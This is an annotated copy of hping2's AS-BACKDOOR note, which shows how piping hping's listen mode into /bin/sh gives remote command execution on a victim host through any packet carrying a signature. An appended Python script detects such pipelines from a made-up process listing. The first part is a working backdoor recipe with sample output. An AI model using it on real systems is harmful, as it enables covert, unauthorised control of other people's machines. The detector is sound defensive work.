Annotation of embedaddon/hping2/docs/AS-BACKDOOR, revision 1.1
hping can be used as a backdoor. Just try the -9 (--listen) option
and pipe it into /bin/sh:

Put hping in listen mode on the victim host.

victim# hping -I eth0 -9 mysign | /bin/sh

Every packet that contains "mysign" will be processed by hping, and
all the bytes that follow "mysign" in the packet will be dumped
to the standard output, so for example I'll be able to exec commands
using all types of protocols. Just for example I can use the smtpd
to exec 'ls' on the victim.

evil$ telnet victim 25

Trying 192.168.1.1...
Connected to nano (192.168.1.1).
Escape character is '^]'.
220 nano.marmoc.net ESMTP Sendmail
mysignls;

On the victim you will see:

victim# hping -I eth0 -9 mysign | /bin/sh
hping2 listen mode
bin cdrom etc home local-home mnt root tmp var
boot dev export lib lost+found proc sbin usr
: command not found

As you can see I used 'ls;' since otherwise the shell will receive
just ls^M. The ";" forces the command execution (at least with bash and zsh,
check your shell for more information).

This works with all kinds of valid, unfiltered IP packets; the higher
level protocol does not matter.

antirez <antirez@invece.org>
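Because the listener accepts its signature inside any IP packet regardless of the higher-level protocol, watching one port on the wire is not a reliable way to spot this; the host-side shape of the pipeline is. The following Python script is an added example for the defender's side, not part of the hping2 documentation or the project's code. It parses a constructed `ps -eo pid,ppid,pgid,args` snapshot (all pids, hosts and commands in it are made up), flags hping processes started in listen mode, extracts the signature argument so it can be searched for in captures, and raises the severity when a shell shares the hping process's parent and process group, which is exactly what `hping -9 sig | /bin/sh` leaves behind. It assumes Python 3.9 or newer.

```python
from __future__ import annotations

import os
import shlex
from dataclasses import dataclass

# Binary names and the two listen-mode option spellings documented for hping.
HPING_NAMES = {"hping", "hping2", "hping3"}
SHELL_NAMES = {"sh", "bash", "zsh", "dash", "ksh"}

# Constructed snapshot modelled on `ps -eo pid,ppid,pgid,args`; values are made up.
SAMPLE_PS = """\
  PID  PPID  PGID COMMAND
    1     0     1 /sbin/init
  812     1   812 /usr/sbin/sendmail -bd -q30m
 1201  1190  1201 -bash
 1345  1201  1345 hping -I eth0 -9 mysign
 1346  1201  1345 /bin/sh
 1402  1201  1402 hping -S -p 80 192.168.1.2
 1500  1190  1500 vim docs/AS-BACKDOOR
"""


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    pgid: int
    cmdline: str


def parse_ps(text: str) -> list[Proc]:
    """Parse the four-column ps output above; the header line is skipped."""
    procs = []
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        pid, ppid, pgid, args = line.split(None, 3)
        procs.append(Proc(int(pid), int(ppid), int(pgid), args))
    return procs


def argv_of(cmdline: str) -> list[str]:
    try:
        return shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a hostile command line
        return cmdline.split()


def basename(argv: list[str]) -> str:
    # Login shells appear as "-bash"; drop that marker before comparing names.
    return os.path.basename(argv[0]).lstrip("-") if argv else ""


def listen_signature(cmdline: str):
    """Return the signature if cmdline is hping in -9/--listen mode, else None."""
    argv = argv_of(cmdline)
    if basename(argv) not in HPING_NAMES:
        return None
    for i, arg in enumerate(argv[1:], start=1):
        if arg in ("-9", "--listen"):
            # The signature is the argument that follows the option.
            return argv[i + 1] if i + 1 < len(argv) else ""
    return None


def is_shell(cmdline: str) -> bool:
    return basename(argv_of(cmdline)) in SHELL_NAMES


def find_listen_pipelines(procs: list[Proc]) -> list[dict]:
    """Flag hping listen-mode processes; a shell with the same parent and
    process group (the layout a `hping -9 sig | /bin/sh` pipeline leaves)
    raises the severity to high."""
    groups: dict[tuple[int, int], list[Proc]] = {}
    for p in procs:
        groups.setdefault((p.ppid, p.pgid), []).append(p)
    findings = []
    for p in procs:
        sig = listen_signature(p.cmdline)
        if sig is None:
            continue
        shells = [s.pid for s in groups[(p.ppid, p.pgid)]
                  if s.pid != p.pid and is_shell(s.cmdline)]
        findings.append({
            "pid": p.pid,
            "signature": sig,
            "shell_pids": shells,
            "severity": "high" if shells else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_listen_pipelines(parse_ps(SAMPLE_PS)):
        print(finding)
```

On the sample snapshot only pid 1345 is reported, with signature `mysign`, shell pid 1346 and severity high; the ordinary `hping -S` scan on pid 1402 is left alone. The extracted signature is the useful pivot: once known, it can be searched for in packet captures across every protocol, which matters because the listener accepts it in any IP packet that reaches the host.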